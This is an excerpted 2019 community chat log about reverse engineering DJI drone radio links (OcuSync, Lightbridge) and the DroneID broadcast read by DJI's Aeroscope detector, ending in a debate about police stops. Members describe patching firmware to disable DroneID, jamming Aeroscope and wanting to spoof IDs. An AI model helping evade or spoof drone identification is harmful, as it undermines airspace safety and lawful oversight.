so it's not secured at all
[2019-04-09 09:10:09]
antoine.menini :
and what about the Phantom? Has the communication been hacked yet?
[2019-04-13 13:22:29]
jabuasab :
@xela75 are you talking about the AES-256 encryption?
[2019-04-15 08:13:06]
xela75 :
yes I do
[2019-04-15 11:46:32]
eseven :
And what about cofdm params?
[2019-04-15 18:41:14]
zwontzov.da :
Ocusync is a LTE-like system: <http://www.programmersought.com/article/1509365733/>
[2019-04-17 12:38:00]
eitan1195 :
did anyone research or attempt to look at the aeroscope's usb interface to check what data is transferred there?or opened the box itself to find out what is in that large black box(modules,sdr,stuff?)
[2019-04-19 14:34:38]
jakwnd :
Has anyone successfully demoded an ocusync or lightbridge signal yet? Ive been looking at it for a while now.
[2019-04-19 14:35:22]
lolo780 :
Find anything interesting?
[2019-04-19 14:35:45]
lolo780 :
I'd like to know why occusync has a distance limit
[2019-04-19 14:35:49]
jakwnd :
just that im not as good with gnuradio as I thought
[2019-04-19 14:36:30]
jakwnd :
what do you mean? there is a hard coded distance limit?
[2019-04-19 14:38:08]
lolo780 :
Yes, the AC and RC can't be more than 17.9km apart
[2019-04-19 14:38:28]
lolo780 :
Otherwise the connection drops until the distance goes under the limit.
[2019-04-19 14:38:39]
lolo780 :
AC does RTH
[2019-04-19 14:39:19]
jakwnd :
woa thats interesting. Ill keep my eyes out
[2019-04-19 14:40:59]
jakwnd :
but the firmware updates specifically for ocusync or lightbridge are not easy to tear apart, dsp packages are not commonly supported by disassemblers, ive been banging my head on em for a bit now.
[2019-04-19 14:42:21]
lolo780 :
I guess that's why nobody has done it
[2019-04-19 14:44:35]
jakwnd :
I was hoping someone here might have tried before lol there was so much work done already identifying the firmware modules
[2019-04-19 14:50:39]
lolo780 :
Seems not much interest
[2019-04-19 14:51:02]
lolo780 :
Or more interesting things to work on
[2019-04-19 14:52:55]
jakwnd :
Yeah, I read this report from department 13 about how they implemented drone id for wifi, I'm curious how they do it for lightbridge/ocusync
[2019-04-19 14:52:57]
jakwnd :
<https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf>
[2019-04-19 15:01:42]
jakwnd :
it also mentions this slack community a lot lol
[2019-05-02 11:11:49]
peteair :
I have. And that's not totally clear for me now. As far as I know the lightbridge uplink pulse are xPSK and not OFDM like stated everywhere
[2019-05-02 20:30:12]
zwontzov.da :
Ocusync 2.0 uses AES-256. So, how does aeroscope work with new drones?
[2019-05-02 20:43:28]
lolo780 :
Aeroscope is so powerful it can decode on the fly
[2019-05-02 20:57:33]
kilrah :
aeroscope doesn't crack the encrypted main stream that goes to you - it listens to a secondary stream the aircraft sends out specifically for it.
[2019-05-02 21:10:43]
lolo780 :
Oh
[2019-05-02 22:33:55]
zwontzov.da :
@kilrah thx. I hope droneid and telemetry packets are in the secondary stream and they can be potentially decoded. but i think that they are encrypted too by a universal master key.
[2019-05-03 09:30:36]
validat0r :
droneid should be pretty much cleartext
[2019-05-03 09:30:59]
validat0r :
if the wifi implementation on spark is any indication
[2019-05-03 10:22:55]
zwontzov.da :
@ilovemynexus4 yes, I read MESMER report. but what is the profit of encryption in the case with AES?
[2019-05-03 10:25:30]
validat0r :
What aes layer is meant? The transport encryption similar to wpa2 on WiFi?
[2019-05-03 10:26:07]
validat0r :
Isn't occusync quite similar to WiFi just on another freq?
[2019-05-03 11:01:34]
lolo780 :
However it works, occusync is just amazing.
[2019-05-03 11:08:38]
zwontzov.da :
Ocusync isn't similar to WiFi, it's similar to LTE. I mean PHY layer. I read official release of DJI: Data Security – All data transmitted through OcuSync 2.0 is encrypted using the leading AES-256 standard, ensuring critical mission information is protected and can only be accessed by authorized parties.
<https://www.dji.com/newsroom/news/dji-improves-enterprise-drones-and-fleet-management-software-to-enable-next-level-commercial-drone-operations>
[2019-05-03 11:12:07]
nopcode :
well, the important question is if the transmission can be disabled in the FW right?
[2019-05-03 11:15:50]
validat0r :
Yeah, anyway .. Point is, occusync transfer wont rat you out, droneid will
[2019-05-03 11:24:40]
nopcode :
occusync could be triangulated though. mavic 1 already sends droneid?
[2019-05-03 11:31:32]
nopcode :
oh i just saw the link to that youtube video of "jamming" aeroscope
[2019-05-03 11:31:32]
validat0r :
Can't really do RC stuff without emitting radio
[2019-05-03 11:31:41]
nopcode :
great that it can be jammed that easily
[2019-05-03 11:32:43]
validat0r :
You could do a mission though
[2019-05-03 11:33:18]
nopcode :
true. when a litchi mission is running you could just switch off the rc right?
[2019-05-03 11:34:53]
validat0r :
I don't do litchi missions .. Just the standard ones. And they are autonomous
[2019-05-03 14:35:21]
zwontzov.da :
@nopcode I thought that aeroscope is only passive unit and hasn't TX part. Besides, aeroscope should know about FHSS law of RC.
[2019-05-03 14:37:01]
antoine.menini :
I think Aeroscope is active but I’m not 100% sure
[2019-05-03 14:37:57]
zwontzov.da :
It was interesting to look at the spectrum of working complex...
[2019-05-03 14:44:16]
zwontzov.da :
@ilovemynexus4 hm, droneid has home point location too, so the receiving of it can detect the pilot position
[2019-05-12 23:09:13]
jabuasab :
@zwontzov.da where are you reading your information from?
[2019-05-13 19:13:29]
zwontzov.da :
@jabuasab What kind of information?
[2019-05-21 07:24:10]
nopcode :
can you guys recommend a software defined radio with a large frequency range and TX capability?
[2019-05-21 07:27:54]
validat0r :
Hackrf?
[2019-05-21 07:40:02]
nopcode :
@ilovemynexus4 that seems unnecessarily expensive
[2019-05-21 07:42:00]
validat0r :
You wanted "large freq range and tx" .. That excludes some cheap RTL USB dongle
[2019-05-21 07:44:23]
nopcode :
also the tx power is way too low
[2019-05-21 07:44:28]
nopcode :
to do anything, i would assume
[2019-05-21 07:44:45]
nopcode :
i would expect like 1W in something like this to be actually useful
[2019-05-21 08:23:23]
wlliamchen :
RTL-SDR has a maximum working frequency of 1.7GHz. it's designed for receiving DAB broadcast.
[2019-05-21 09:56:30]
peteair :
I'm using a LimeSDR Mini: it's about 150 usd with very good performance, 1 Rx + 1 Tx and it goes up to 3.5 GHz
[2019-05-21 09:56:53]
peteair :
> 3.5 GHz (usually 6 GHz) is more difficult to achieve with standard components and the price goes up quickly
[2019-05-21 09:57:06]
peteair :
ah and it has a sampling rate of 40 msps
[2019-05-21 11:08:07]
nopcode :
oh that sounds good
[2019-05-21 11:08:10]
nopcode :
how is the tx power?
[2019-05-21 11:47:17]
xela75 :
<https://discourse.myriadrf.org/t/limesdr-s-maximum-transmitting-power-at-different-frequencies/1649>
[2019-05-21 12:57:20]
nopcode :
ah seems ok
[2019-05-21 16:24:03]
peteair :
this article is not for the mini but yes I've tested it and the higher the frequency, the lower the output power
[2019-05-21 16:24:15]
peteair :
only a few dBm when you reach the Ghz band
[2019-05-21 16:24:37]
peteair :
so if you want to have more power you will probably need to add an amp
[2019-05-22 06:44:56]
nopcode :
is there like a plug & play amp for SDR boxes?
[2019-05-22 06:45:22]
nopcode :
i wouldnt feel like collecting additional boxes for each frequency band
[2019-05-22 15:35:30]
peteair :
hm not that I know
[2019-05-22 15:35:50]
peteair :
it's difficult to have a very wideband amp so you will most probably need a 2.4 GHz one and a 5 GHz one
[2019-05-29 18:38:52]
zwontzov.da :
The question is about ocusync signal structure on stackexchange :slightly_smiling_face:
<https://dsp.stackexchange.com/questions/58064/how-is-dji-ocusync-wireless-link-physical-layer-implemented>
[2019-05-29 20:19:53]
zwontzov.da :
Does the ocusync use diversity technique on the receiver side? The RC has 2 antennas, so maximal ratio combining can improve performance, but in the FCC document only SISO mode is described for ocusync.
[2019-05-29 20:20:20]
zwontzov.da :
The device employed 10 MHz, 20 MHz modes support SISO mode at antenna chain 0 or chain 1.
Why is it?
<https://fccid.io/SS3-OAS11709/Test-Report/Test-Report-3634081>
[2019-05-29 20:26:47]
zwontzov.da :
Is it only for FCC testing mode?
SYSTEM TEST CONFIGURATION
Description of Test Configuration
The system was configured for testing in Engineering Mode, which was provided by the manufacturer.
The device employed 1.4MHz, 10MHz, 20MHz modes and Wi-Fi 802.11b, 802.11g, 802.11n ht20 modes,
1.4MHz, 10MHz, 20MHz only support SISO mode at antenna chain 0 or chain 1, Wi-Fi 802.11b/g/n ht20
mode support SISO and MIMO modes.
<https://fccid.io/SS3-M1P1607/Test-Report/Test-Report-3146117>
[2019-05-30 11:22:31]
peteair :
the "chinese" site mentioned on Stack Exchange is indeed only a generic description of OFDM modulation (hence the mention of Alamouti code)
[2019-05-30 11:23:12]
peteair :
concerning your other question, I don't know but the second FCC doc you shared mentioned MIMO/SISO because it's about WiFi not Ocusync
[2019-05-30 11:23:37]
peteair :
I guess your first document is more related to ocusync and seems to mention SISO only
[2019-05-30 18:28:50]
zwontzov.da :
It's very strange... The Ocusync should have better receive quality in comparison with WiFi. Why do they use only 1 Rx antenna?
In LTE publications and reports, the common scheme is 1Tx - 2Rx antennas.
[2019-05-30 19:54:39]
jakwnd :
I also think its important to realize OcuSync uses two different links(?)/bands(?)/(idk the right term) for uplink and downlink
[2019-05-30 19:55:07]
jakwnd :
uplink is OFDM while downlink stays put and is much larger
[2019-05-30 19:55:33]
jakwnd :
the downlink hops channels only when there is interference
[2019-05-31 07:05:46]
peteair :
don't you think downlink is ofdm as well ?
[2019-05-31 07:06:34]
peteair :
and to answer the question from Sam, yes I think diversity is always a good thing but it adds receiver and processing complexity for a, sometimes, small gain
[2019-05-31 07:07:12]
peteair :
so as Ocusync is already much more efficient than regular WiFi, maybe it was more interesting to not use MIMO to avoid over-complexity
[2019-05-31 07:10:04]
zwontzov.da :
They use a Leadcore chip which provides LTE standard processing. Unfortunately, we have no specification, but I think it supports SIMO mode.
Maybe there are some problems with AD9361 and its channels...
[2019-05-31 13:02:34]
peteair :
LC is the main processor but not the one managing the RF layer. AD9361 is just the digital to analog (and vice versa) chip transforming IQ data into physical signal
[2019-05-31 13:03:17]
peteair :
my understanding is that the real part where Ocusync resides is the FPGA and the chip managing the RF layer and in charge of the modulation (just before the FPGA/AD931 I guess)
[2019-05-31 13:05:13]
peteair :
I'm not sure the LC1860 reversing (eg. <https://github.com/fvantienen/dji_rev>) gave any clue about the Ocusync modulation ? unless someone can say otherwise
[2019-05-31 18:02:15]
zwontzov.da :
thx. I thought that the FPGA is only in previous DJI models with Lightbridge
[2019-05-31 18:05:50]
zwontzov.da :
but at the photos I don't see FPGA
<https://github.com/o-gs/dji-firmware-tools/wiki/WM220-Core-Board-A>
[2019-05-31 18:54:33]
jakwnd :
From recordings I've never seen the downlink jump around unless it was changing channels due to interference. There may be a ofdm aspect to it for sync or authentication, but it seems pretty standard to me.
Lightbridge uplink had a clear pattern for the ofdm and ocusync seems to have it randomized.
My understanding was that lightbridge uses a fpga for the rf and ocusync they use a more programmable SDR so they can implement updates easily.
[2019-05-31 18:55:58]
jakwnd :
There is very little to learn from an RF side from the LC 1860, it seems to communicate with the rf module either over serial or i2c, either way it doesn't help with modulation
[2019-05-31 19:19:54]
zwontzov.da :
Where do frames form? LC 1860 is only en(de)coder and (de)modulator. In ARMs into LC? What is the main CPU of drone? If it's LC, we can't analyze communication between chips by i2c, spi, etc :disappointed:
[2019-06-04 10:07:58]
peteair :
Demodulation could be done blindly (without knowing anything about it). I'm pretty sure that's ofdm now for lightbridge and I've made some progress (definitely ofdm). So once it's demodulated we could learn some things about channel coding and encryption by looking at the exchange between chips. Am I right? I can help for the demodulation part but I'm not so versed in spi sniffing and so on
[2019-06-04 17:45:22]
jakwnd :
Once it's demoded we should be able to see the droneid at least, as it shouldnt be encrypted
[2019-06-09 12:06:02]
zwontzov.da :
What do you know about Aeroscope hardware? Is it own ASIC, FPGA, DSP or common CPU? I can't find the photos or description :disappointed:
[2019-06-09 16:41:42]
jakwnd :
Have no idea
[2019-06-23 21:08:56]
zwontzov.da :
What does peer id mean?
[2019-06-25 23:54:07]
kyokushin :
Only AC is spreading Drone ID or RC also?
[2019-06-26 09:10:41]
validat0r :
only ac .. and it's kinda garbled on spark. I don't think it's useful to aeroscopes ..
[2019-06-26 16:03:57]
kyokushin :
hmm garbled?
[2019-06-26 16:06:50]
validat0r :
well, from what I saw in wireshark / kismet-wireless, there's no meaningful content in the spark droneid packets
[2019-06-26 16:06:59]
validat0r :
just zeros
[2019-06-26 16:07:15]
validat0r :
my wifi card could have picked it up wrong, of course
[2019-06-26 16:09:08]
validat0r :
I saw only 3 bytes of data that wasn't 0x00
[2019-06-26 16:09:20]
validat0r :
not much info you can pack in 3 bytes
[2019-06-26 16:09:34]
validat0r :
disabled it anyway
[2019-06-26 16:52:57]
kyokushin :
Hm, disabled how?
[2019-06-26 19:40:36]
validat0r :
I patched the activation in the appropriate binary
[2019-06-26 19:52:05]
kyokushin :
hm how?
[2019-06-26 19:55:44]
validat0r :
vi
[2019-06-26 20:10:23]
kyokushin :
okay, but in which file and how to get to it?
[2019-06-26 20:36:38]
validat0r :
Dji_network
[2019-06-26 20:44:33]
kyokushin :
hmm, i was less active in last half year, what is that?
[2019-06-26 21:00:43]
validat0r :
A binary in 801
[2019-06-26 21:04:23]
kyokushin :
ookay, but how you edit that? i know in vi, but not exactly know you have on mind
[2019-06-26 21:05:03]
validat0r :
Let's go there when you have your working spark back
[2019-06-26 21:05:18]
kyokushin :
Sure
[2019-07-01 07:55:13]
xela75 :
is it the same Dji_network file on Mavic to disable Drone ID ?
[2019-07-01 08:43:02]
validat0r :
No
[2019-07-01 08:44:18]
eitan1195 :
it is a part of the ath9k driver
[2019-07-01 11:49:29]
xela75 :
Hum ok because it's wifi
[2019-07-01 11:49:32]
xela75 :
thx
[2019-07-01 11:52:30]
eitan1195 :
anyone had any progress researching the ocusync?more specifically the droneid channel in it?
[2019-07-01 11:54:48]
validat0r :
on mavic it's believed to live in dji_hdtv_uav
[2019-07-01 11:56:01]
validat0r :
but you'd need sophisticated radio equipment or an actual aeroscope to check anything on ocusync
[2019-07-01 11:57:40]
eitan1195 :
are you referring to ocusync? as i believe it resides much lower than dji_hdvt_uav
[2019-07-01 11:57:59]
eitan1195 :
the "how" is what's interesting, not the "where"
[2019-07-01 11:58:31]
validat0r :
i was talking to @xela75
[2019-07-01 12:00:39]
xela75 :
yes on mavic 1 it's ocusync
[2019-07-01 12:02:32]
xela75 :
and knowing where and in what file droneID would be set is already interesting
[2019-07-01 12:03:28]
xela75 :
but I assume that NLD team already knows that
[2019-07-01 12:03:44]
validat0r :
i know of at least one attempt to disable it, but it could never be disproved without access to a aeroscope
[2019-07-01 12:03:47]
xela75 :
because it's in the pipe
[2019-07-01 12:04:30]
validat0r :
good to know it's in the pipe
[2019-07-01 12:05:42]
xela75 :
I heard @coldflake talking about it...
[2019-07-01 12:09:30]
xela75 :
indeed there is a "drone id %s" string in dji_hdvt_uav
[2019-07-01 12:43:23]
coldflake :
We have it on the shelves and we can put it out in the next release
[2019-07-01 12:43:59]
coldflake :
Which then will be out around Friday maybe a little earlier :)
[2019-07-01 14:05:37]
fredmicrowave :
That's super cool. I was actually wondering if this was still on.
I remember opining that custom ID (vs no ID) may not be a good idea, but on a second thought, it may be useful ...
[2019-07-01 14:06:41]
fredmicrowave :
"A little earlier" sounds cool .
[2019-07-01 15:42:14]
kyokushin :
Excellent news @coldflake
[2019-07-03 18:57:43]
kyokushin :
Will that disable spreading of gps location of drone/operator to aeroscope?
[2019-07-05 07:42:55]
xela75 :
drone and homepoint
[2019-07-05 09:25:45]
peteair :
homepoint as in RTH ? Is it broadcast by the drone ?
[2019-07-05 10:16:19]
validat0r :
yep
[2019-07-05 10:16:48]
validat0r :
so Chinese gov always knows where to snatch you
[2019-07-05 12:54:48]
peteair :
ahahah funny
[2019-07-05 12:54:59]
peteair :
is this something you have seen in the firmwares ?
[2019-07-05 12:55:21]
peteair :
I'm beginning to poke around the Mavic 2 firmware but it's still a bit cryptic for me
[2019-07-17 19:37:49]
jakwnd :
Has anyone tried looking at the RF and demoded LB or Ocu?
The Spark drone id will populate on the latest firmware. At least I saw gps, the flight purpose messages never had any meaningful data other than serial number.
[2019-07-18 12:11:56]
antoine.menini :
it seems difficult to do
[2019-07-18 12:12:10]
antoine.menini :
there is no info about modulation of LB or Ocusync
[2019-07-18 12:12:53]
antoine.menini :
is the drone id sent using the same protocol as the other information?
[2019-07-23 23:58:06]
ryan929 :
Just saw this -- I may be interested in looking at the blackbox RF - can you share an overview of which models it is on for me as I'm new to this device type, although very used to looking at blackbox RF on other things...
[2019-07-31 07:35:05]
eitan1195 :
did anyone by any chance do some work on the modulation(de-modulation) of the lightbridge and could possibly shed some light on a few aspects?thnx
[2019-07-31 11:39:20]
mefisto :
You should probably start by looking at AD9363 specs. This is the transceiver lightbridge2 used in its original version, in early ph3s. Before they switched to Artosyn knock-off. So lightbridge signals are definitely within what AD9363 can do. And we can easily read SPI commands sent to it from STM32, so we can get specifics on how it is configured. This is what I did when making the ability to set power to fcc and above.
[2019-07-31 12:08:20]
eitan1195 :
thanks. Do we know if it is wimax or not? tried using gnuradio chains for wimax and did not succeed..
[2019-07-31 12:25:16]
mefisto :
No idea. Check in specs which registers are used to configure what you want to know in AD9363, then we can look at what is written to these registers and find out in which mode AD9363 operates.
[2019-08-01 07:56:15]
peteair :
hi, my other idea for that topic was to analyse the FPGA bitstream because I guess the real info about modulation are there
[2019-08-01 07:56:27]
peteair :
any idea on how to do that ?
[2019-08-01 07:56:39]
peteair :
do we have any chance to find strings or other clues in the FPGA bitstream ?
[2019-08-01 11:57:23]
mefisto :
fpga bitstream contains info on digital processing, error correction etc. FPGAs do have auxiliary fixed blocks, but I doubt there's one for modulation.
[2019-08-01 11:58:48]
mefisto :
The bitstream format was public for older Altera FPGAs; so I guess we could try finding the same structures in newer bitstreams. But I doubt anyone did that.
[2019-08-01 12:04:16]
mefisto :
The STM32 firmware is much easier to analyze. I even published some symbol definitions for specific firmwares:
<https://github.com/o-gs/dji-firmware-tools/tree/master/symbols>
[2019-08-01 13:11:52]
peteair :
thank you for that !
[2019-08-05 17:36:38]
mutantroar :
I'm at a bit of an impasse and I was wondering if someone could point me in the right direction.
I've been able to sniff the droneid from my Spark from the beacon packets when operating in WiFi without the RC...easy. Using the RC...not so easy.
[2019-08-05 17:37:01]
mutantroar :
The access point on the RC is not broadcasting it in its beacon packets, so it must be in the C2 signal. Irrespective of whether you use the RC or not, you can set the Wifi channel, so I was suspecting the RC is just using some type of ad hoc Wifi network to communicate with the Spark, but still using WiFi.
[2019-08-05 17:37:17]
mutantroar :
Can anyone confirm that and if there "should" be some way to sniff that with a WiFi adapter? The Drone-RC signal changes to a single 5MHz channel instead of the wider bandwidth when not using the RC. I was hoping I'd be able to sort this out by manually setting frequency and bandwidth parameters on my adapter to just the 5Mhz bandwidth and just sniffing with Wireshark, but no joy.
[2019-08-05 17:51:18]
validat0r :
spark rc is using ad hoc mode
[2019-08-05 17:51:41]
validat0r :
beacons should only emanate from AC
[2019-08-05 17:52:29]
validat0r :
only few wifi cards can be configured to sniff the 5Mhz channels
[2019-08-05 17:53:09]
validat0r :
try kismet
[2019-08-05 17:53:26]
validat0r :
/usr/local/etc/kismet_site.conf:
source=wlan10k0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"
[2019-08-05 17:53:59]
validat0r :
I had luck with my old thinkpad's wifi adapter
[2019-08-05 17:54:38]
validat0r :
Atheros ath9k Atheros QCNFA222 AR5BWB222 / pci cards seem to support it
[2019-08-05 17:56:42]
validat0r :
I found droneid to be crippled on spark. no flight purpose, gps coords, etc. maybe due to old firmware .0300 / GO 4.1.14, did my tests some 12 months ago
[2019-08-05 18:13:21]
mutantroar :
Thanks for that about the cards/chipset. It took me a while to get a card that would be able to even get the higher 5Ghz U-III-3 channels like 149+ It seems to be a bit of trial and error.
[2019-08-05 18:25:36]
validat0r :
obviously i got my droneid frames on 2.4GHz .. T41p has no 5GHz capa :smile:
[2019-08-05 18:27:38]
mutantroar :
uggh. Spark seems to like hanging out at 5GHz in Auto mode
[2019-08-05 18:27:55]
validat0r :
you can force it to 2.4GHz somehow ..
[2019-08-05 18:28:39]
validat0r :
I think GO 4.1.22 can put it in the lower band
[2019-08-05 18:28:55]
mutantroar :
Yeah...it was nice trying to sniff at 5Ghz since it wasn't crowded with other noise
[2019-08-05 18:29:31]
validat0r :
if you've got the right wifi card .. I didn't, so i had to try on 2.4
[2019-08-05 18:33:30]
mutantroar :
I think you've nailed my problem. You were able to get the adhoc packets, though, right?
[2019-08-05 18:33:39]
validat0r :
yup
[2019-08-05 18:33:48]
mutantroar :
:slightly_smiling_face:
[2019-08-05 18:35:04]
validat0r :
ac<->rc is adhoc .. standard infrastructure is just smartdevice<-> ac, which is boring, since you can't really go far in that mode
[2019-08-05 19:11:34]
kyokushin :
<https://translate.google.pl/translate?sl=pl&tl=en&u=https%3A%2F%2Fnextron.pl%2FAeroScope-Opis-i-mozliwosci-wykrywacza-dronow-blog-pol-1563455047.html>
[2019-08-05 19:11:59]
kyokushin :
its from polish website so google may translate it poorly, but to the point - they wrote aeroscope see Sparks.
[2019-08-05 20:09:11]
validat0r :
awesome .. i've been looking for such a test for long
[2019-08-05 20:10:37]
validat0r :
i dont see any spark detections though ..
[2019-08-05 20:11:03]
validat0r :
they may have copied it from the marketing specs of aeroscope
[2019-08-05 20:25:08]
kyokushin :
no, they had it - it's a shop with drone accessories
[2019-08-05 20:41:02]
mefisto :
Spark is on their "supported" list, but not "tested" list. And I have a feeling that was more like a presentation by DJI than real tests.. might be wrong though.
I highly doubt Aeroscope can see a drone location 2-3 seconds after it's turned on.
[2019-08-05 20:41:48]
validat0r :
hell i dont even have a gps fix after 3 secs ..
[2019-08-05 20:42:41]
validat0r :
and yes .. text doesnt say spark was tested .. neither was MA
[2019-08-05 20:43:27]
kyokushin :
yes, they had different drones to test as i see
[2019-08-05 20:43:49]
validat0r :
and if the AC is sitting somewhere in tall grass behind a tree, I doubt they catch a droneid frame that fast
[2019-08-06 16:00:38]
zwontzov.da :
@ilovemynexus4 I don't have a special wifi card, but have an SDR. I wanna see DroneID bursts in the spectrum. I write IQ samples in the wide bandwidth and see the common 20 MHz channel from AC, but can't see the 5 MHz bursts :disappointed: Does the DroneID occupy the same CH as the common 20 MHz link? And what about the DroneID burst period in the time domain?
[2019-08-06 16:21:29]
validat0r :
Motor has to be armed, you know
[2019-08-06 16:22:46]
validat0r :
Have to check my cap files for the rest.
[2019-08-06 16:34:56]
zwontzov.da :
Thx. I will check myself)
[2019-08-06 16:55:36]
validat0r :
i'm not sure you're gonna see "bursts" .. it's just the occasional packet, i have two in my pcap, 19s apart
[2019-08-06 16:56:05]
validat0r :
interestingly on ch.1 and ch.3
[2019-08-06 17:10:47]
validat0r :
but i didnt do any "in depth" analysis .. I just wanted to confirm, that my defeat worked
[2019-08-06 17:12:33]
validat0r :
i.e. i'm not sure any more the AC had a proper GPS fix during my test. I suspect, not
[2019-08-06 17:13:24]
mutantroar :
@zwontzov.da are you talking about capturing the DroneID from the WiFi signals (like the Spark) with the SDR or trying to get it from the lightbridge or Occusync RF signals?
[2019-08-06 17:16:51]
zwontzov.da :
@ilovemynexus4 I want to start from known DroneID, i.e. WiFi. I reread Department13 description and try to see packets from drone.
Thanks for your reply. I will try analyze my records. Unfortunately, my Spark is broken and I can't make new records.
[2019-08-06 17:17:25]
validat0r :
that's unfortunate
[2019-08-31 19:32:04]
jemo07 :
@sam how are you capturing the data with the SDR? I’m having lots of interference at home and can’t seem to get a good look at the traffic to begin defining a flowgraph to properly capture and begin to attempt to decode. Thanks!
[2019-09-04 05:26:25]
eseven :
Any one knows the firmware update release version that implements droneID on Phantom 4 Pro? I've been looking for a link on historical info on every DJI firmware updates features with no success... :confused:
[2019-09-05 02:20:16]
digdat0 :
dated 2017-12-01: <https://www.dji.com/newsroom/news/dji-introduces-voluntary-flight-identification-options-for-drone-pilots>
p4p release notes: <https://dl.djicdn.com/downloads/phantom_4_pro/20180308/Phantom_4_Pro_Release_Notes_EN.pdf>
p4p V 01.05.0300 was released on 2017.12.25, so that's probably the one? Or, did they release it silently before announcing publicly? This article is from 2017-11-16 <https://www.kismetwireless.net/development/droneid/> so it's likely it was added earlier? also, what about GO support for DroneID? What version was that in?
[2019-09-05 09:09:55]
xela75 :
it's for wifi only i guess
[2019-09-05 11:53:23]
eseven :
Thanks @digdat0!!
[2019-10-05 15:03:23]
nocommie :
So I recently saw a report from this system. <https://www.911security.com/products>
[2019-10-05 15:04:17]
nocommie :
Some of the screens have "aeroscope" on them so I imagine it is just a repackaging of it.
[2019-10-05 15:05:08]
nocommie :
It showed the home position, current drone position, craft name, aeroscope ID and drone ID..
[2019-10-05 15:06:50]
nocommie :
The particular incident I observed indicated it was in and out of controlled airspace.
[2019-10-05 15:07:59]
nocommie :
What is concerning is that the local law enforcement are attempting to catch these violators and are being told bad info by uninformed drone "experts" in the department.
[2019-10-05 15:09:26]
nocommie :
My concern is that these uninformed experts give the line guys bad info and will be taking action against normal hobbyists or commercial operators that know what they are doing and are legit, not breaking any laws.
[2019-10-05 15:10:39]
nocommie :
So, now more than ever I want to spoof my aeroscope info. I am guessing it is still not possible on P4, Mp1 or Mp2?
[2019-10-05 15:12:19]
nocommie :
I have been contemplating switching from DJI but frankly there weren't many options until now. My Anafi thermal and the Skydio 2 will be replacing my DJI fleet soon.
[2019-10-05 20:10:28]
dkovar :
What "bad info" are they being told?
[2019-10-05 22:27:04]
cantrepeat :
I know it's do able, spoofing the ID, @coldflake said they had it done and would release it in a version of NLD. Dunno when that will happen.
[2019-10-06 01:50:46]
bobdole :
bad info - advising local law enforcement that they are somehow agents of the FAA that can decide what aircraft to take down from the sky?
[2019-10-06 01:51:03]
bobdole :
LOL... that would be priceless
[2019-10-06 02:33:22]
nocommie :
Bad info as an example, get their ID, 107 if they have one, serial number of the controller, serial and registration of the aircraft SIMPLY for someone "complaining" about a drone, even if no laws are broken. And that they can be detained for "trespassing" if they violate a TFR even if they are not physically on the property.
[2019-10-06 10:17:12]
dkovar :
That's not bad info. They are entitled to ask for that information and until the case law shakes out, it is not terrible advice. They have a duty to respond to complaints. (Ref recent IED attacks via drone in PA.)
It isn't information we agree with, but that's a different story. And, if it does turn out to be bad, i.e. wrong, then we'll have case law to support that position and it'll be much easier to say "Don't do this." That's the way the legal system works.
We don't want LE "harassing" hobbyists but that doesn't necessarily make the advice bad.
Also, most LE I know would prefer not to hassle anyone. They have better things to do with their time.
[2019-10-06 10:19:20]
dkovar :
This is an example of some materials that an LE group I know are using to educate themselves.
<https://www.foxrothschild.com/content/uploads/2019/10/Aviation-Law-Drone-Defense_-The-Rules-The-Regulations-and-What-You-Can_t-Do-10.01.19.pdf>
[2019-10-06 12:53:30]
cantrepeat :
Hogwash, in the US at least. Just because someone drops dope in a prison and others use weapons with explosives on them to destroy oil facilities doesn't make a Joe with a Mavic subject to stop and frisk type behavior by police.
[2019-10-06 12:59:57]
dkovar :
That is your opinion. The law says otherwise. We can object but if there are legitimate grounds for asking for documentation, LE will use them. It isn't "stop and frisk of every Joe with a Mavic". It is a legal request for documentation operators are required to have by sworn LE in the course of their duties.
[2019-10-06 13:25:56]
cantrepeat :
If I'm flying a drone in an unrestricted area then the LE has no probable cause to initiate that contact.
[2019-10-06 13:26:18]
cantrepeat :
They can't assume that I'm breaking the law and ask for papers.
[2019-10-06 13:29:12]
dkovar :
That wasn't the stated use case. The stated use case was "SIMPLY for someone "complaining" about a drone". Agreed, if no probable cause, no justification.
[2019-10-06 13:30:13]
cantrepeat :
people can complain about legal behavior all they want. It doesn't make that behavior illegal so again, don't stop me and ask for papers
[2019-10-06 13:30:46]
bobdole :
people always complain about drones... what we need are more complaints flooding the police dept
[2019-10-06 13:42:27]
dkovar :
If you run a dirt bike up and down the street and someone calls in a noise complaint, LE will stop you and ask for your license. If you run a drone up and down the street and someone calls in a noise complaint, LE will stop and ask you for your license. It is exactly the same thing. Drones don't get some sort of free pass.
[2019-10-06 14:00:27]
bobdole :
this is assuming someone with the drone is being as obnoxious as the guy on the dirt bike. people just don't like drones in the sky potentially seeing over their fences
[2019-10-06 14:00:38]
bobdole :
the complaints are not comparable
[2019-10-06 14:01:50]
bobdole :
for LE to have authorization to take aircraft down from the sky, they better be as well versed in what is going on up there as a part 107 UAS pilot at a minimum
[2019-10-06 14:03:40]
bobdole :
eventually all this overpriced crap being sold to idiots over drones is going to catch up with them.. hopefully before they hit retirement
[2019-10-06 14:13:04]
dkovar :
You're mixing the discussions. "Taking down the aircraft" is not an option for local LE at the moment. And hopefully, never.
[2019-10-06 14:39:56]
cantrepeat :
running a non-registered dirt bike up and down the street is an illegal activity. Flying a drone in non-regulated air space is not illegal. Those are apples to oranges
[2019-10-06 14:40:41]
cantrepeat :
Flying a drone up and down the street is not an illegal activity. You don't get to ask for my papers when I'm not doing anything illegal
[2019-10-06 14:43:06]
cantrepeat :
Look at all the shit over legal open carry, LE is getting their asses handed to them for stop and ID. If you are open carry in a legal state then LE can get bent. Same with flying a drone.
[2019-10-06 14:45:23]
cantrepeat :
look at all the first amendment audits around police stations and military installations, it's a legal activity and people are refusing to ID.
[2019-10-06 14:45:39]
cantrepeat :
same shit applies to legally flying a drone no matter who complains about it.
[2019-10-06 15:05:28]
bobdole :
probably no way around drone identification and I'm guessing it's going to eventually turn into something where you can spot and identify any drone in the sky (or flightradar24) just like you can pull up info on a pilot from the registration number on the plane.
[2019-10-06 15:34:43]
dkovar :
Yep. This is all Remote ID.
[2019-10-06 17:27:04]
cantrepeat :
After 23 years in the Army I'm about as pro-cop as they come, but, I'm also pro rights for the average Joe. Trying to initiate contact over a legal activity so they can go fishing is pure BS.
[2019-10-06 17:32:09]
cantrepeat :
Sorry for the rant, just some strong feelings about this kind of stuff.
[2019-10-06 18:36:20]
dkovar :
